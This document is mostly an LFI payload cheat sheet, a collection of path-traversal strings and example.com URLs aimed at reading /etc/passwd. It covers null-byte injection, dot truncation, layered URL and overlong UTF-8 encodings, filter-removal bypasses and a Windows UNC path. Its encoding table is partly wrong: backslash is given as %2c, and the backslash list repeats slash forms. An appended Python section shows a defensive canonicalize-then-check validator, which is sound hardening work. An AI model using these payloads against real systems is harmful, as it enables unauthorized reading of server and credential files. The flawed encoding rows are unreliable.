LFI


Null Character:
Sometimes applications append extra characters, such as a file extension, to the input variable. A null byte makes the application ignore everything that follows it.

original → index.php?somefile=image.jpeg
testing  → index.php?somefile=../../../../etc/passwd%00image.jpeg

Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863

===========================================================

Dot Truncation
In PHP, filenames longer than 4096 bytes are truncated, and the characters after that point are ignored.

http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd

Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/

=======================================================


Encoding 
Manipulating variables that reference files with "dot-dot-slash" (../) sequences and their variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.

Char    URL     Double URL    UTF-8 Unicode                    16 bits Unicode
.       %2e     %252e         %c0%2e   %e0%40%ae   %c0%ae      %u002e
/       %2f     %252f         %c0%2f   %e0%80%af   %c0%af      %u2215
\       %2c     %252c         %c0%5c   %c0%80%5c               %u2216



Encoded ../:

%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215



Encoded ..\:
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216



Double URL Encoding:

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd


UTF-8 Encoding:

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd



Bypass Filtering:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd


Bypass ../ removal:
..././
...\.\


Bypass ../ replaced with ;:
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt




Windows UNC Share:

Windows UNC shares can be injected to redirect access to other resources.

\\localhost\c$\windows\win.ini
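
Why the filters bypassed above fail, and what holds up instead, as an added defender-side example (not part of the original page): naive_resolve strips ../ once, while safe_resolve decodes fully, canonicalizes, and only then checks that the result stays inside the include directory. BASE_DIR and all function names are assumptions; the sample values are the payload shapes listed above plus one constructed benign name.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/srv/app/pages"  # assumed include directory (hypothetical)

def naive_resolve(value: str) -> str:
    """Weak pattern: strip '../' in a single pass, then build the path."""
    cleaned = value.replace("../", "")
    return os.path.normpath(os.path.join(BASE_DIR, cleaned))

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value is stable, unwrapping double encoding.
    Invalid UTF-8 such as the overlong %c0%ae raises UnicodeDecodeError,
    which is a subclass of ValueError."""
    for _ in range(max_rounds):
        decoded = unquote(value, errors="strict")
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def safe_resolve(value: str, base_dir: str = BASE_DIR) -> str:
    """Canonicalize first, then check containment; never 'clean' the input."""
    value = fully_decode(value)
    if "\x00" in value or "\\" in value or "%" in value:
        raise ValueError("NUL, backslash or leftover escape in path")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path is outside the base directory")
    return target

def is_rejected(value: str) -> bool:
    """True when safe_resolve refuses the value."""
    try:
        safe_resolve(value)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    # Values in the shapes listed on this page, plus a constructed benign name.
    for s in ("about.html", "....//....//etc/passwd",
              "%252e%252e%252fetc%252fpasswd",
              "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
              "../../../../etc/passwd%00image.jpeg"):
        print(f"{s!r}: naive={naive_resolve(s)!r} rejected={is_rejected(s)}")
```

Because safe_resolve never rewrites the input, ....// is treated as a literal directory name inside BASE_DIR rather than collapsing into ../ the way it does after the single-pass strip.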
